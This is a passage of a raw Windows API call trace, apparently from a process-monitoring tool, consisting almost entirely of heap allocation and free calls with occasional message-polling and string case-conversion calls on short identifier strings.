hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0267.800] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.802] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0267.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.803] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.803] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.803] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.803] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.807] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0267.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.807] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.808] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.808] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0267.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0267.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.810] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa740 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.810] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.811] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.811] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0267.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0267.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0267.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0267.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0267.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0267.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0267.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0267.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 